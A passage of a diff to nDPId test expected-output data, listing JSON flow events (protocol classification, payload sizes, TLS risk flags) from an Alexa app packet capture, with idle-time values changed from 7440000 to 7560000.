{"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00935{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00935{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 